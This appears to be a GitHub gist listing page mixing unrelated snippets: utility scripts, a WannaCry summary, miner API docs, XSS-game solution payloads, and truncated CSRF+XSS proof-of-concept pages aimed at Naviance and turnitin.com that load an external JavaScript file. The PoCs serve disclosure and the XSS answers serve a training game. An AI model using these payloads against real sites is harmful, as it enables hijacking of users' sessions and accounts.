Free and Open Source Bugs (FOSB)

Aaron Esau Arinerron

@Arinerron
Arinerron / ChaosWebs.java
Last active March 17, 2022 17:41
Detect when a new post is made on @beardog108's blog (https://chaoswebs.net/blog/).
import java.util.*;
import java.util.regex.Pattern;
import java.net.*;
import java.io.*;
public class ChaosWebs {
    public static double time = 6 * 60 * 60 * 1000;
    public static String filename = ".last_post.txt";
    public static void main(String[] args) {
@Arinerron
Arinerron / xss-game-solutions.txt
Last active January 12, 2017 19:05
These are my solutions to http://xss-game.appspot.com/. I did not use any hints on these, but I took a while on the last two.
[Level 1]: Search for the string.
<script>alert(1)</script>
[Level 2]: Post the string
<img src=x onerror=javascript:alert(1)></img>
[Level 3]: Navigate to the URL
http://xss-game.appspot.com/level3/frame#1' onerror="javascript:alert(1)"
@Arinerron
Arinerron / python.sh
Created January 17, 2017 02:06
Installs Python-3.4.2
wget https://www.python.org/ftp/python/3.4.2/Python-3.4.2.tgz
tar xvf Python-3.4.2.tgz
cd Python-3.4.2
./configure
make
make test
sudo make install
cd ..
rm -rf Python-3.4.2
rm Python-3.4.2.tgz
@Arinerron
Arinerron / naviance.html
Created April 11, 2017 00:20
Naviance CSRF+XSS / proof of concept
<html>
<body>
<!--
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js".
-->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://connection.naviance.com/family-connection/success-planner/goals/save' target="csrf-frame" id="csrf-form">
@rueberger
rueberger / parse_nvidia_smi.py
Created April 20, 2017 21:40
Simple script that parses and returns the output of nvidia-smi
import commands
import numpy as np
def fetch_gpu_status():
    """ Run nvidia-smi and parse the output
    requires Python 2 only dependency
    """
    status_code, output = commands.getstatusoutput('nvidia-smi')
vim ~/.ctags
--langdef=Solidity
--langmap=Solidity:.sol
--regex-Solidity=/^contract[ \t]+([a-zA-Z0-9_]+)/\1/c,contract/
--regex-Solidity=/[ \t]*function[ \t]+([a-zA-Z0-9_]+)/\1/f,function/
--regex-Solidity=/[ \t]*event[ \t]+([a-zA-Z0-9_]+)/\1/e,event/
--regex-Solidity=/[ \t]*(struct[ \t]+[a-zA-Z0-9_]+)([ \t]*\{)/\1/v,variable/
--regex-Solidity=/[ \t]*(enum[ \t]+[a-zA-Z0-9_]+)([ \t]*\{)/\1/v,variable/
--regex-Solidity=/[ \t]*mapping[ \t]+\(([a-zA-Z0-9_]+)[ \t]*=>[ \t]*([a-zA-Z0-9_]+)\)[ \t]+([a-zA-Z0-9_]+)/\3 (\1=>\2)/m,mapping/

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 and $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@Arinerron
Arinerron / turnitin.html
Created May 23, 2017 04:38
turnitin.com CSRF+XSS / proof of concept
<html>
<head>
<title>turnitin.com PoC</title>
</head>
<body>
<!--
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js".
-->
@ivy
ivy / API.txt
Created July 3, 2017 19:21
Claymore JSON-RPC API documentation (from Claymore v9.6)
EthMan uses raw TCP/IP connections (not HTTP) for remote management and statistics. Optionally, the "psw" field is added to requests if the password for remote management is set for the miner.
The following commands are available (JSON format):
----------------
REQUEST:
{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
RESPONSE:
{"result": ["9.3 - ETH", "21", "182724;51;0", "30502;30457;30297;30481;30479;30505", "0;0;0", "off;off;off;off;off;off", "53;71;57;67;61;72;55;70;59;71;61;70", "eth-eu1.nanopool.org:9999", "0;0;0;0"]}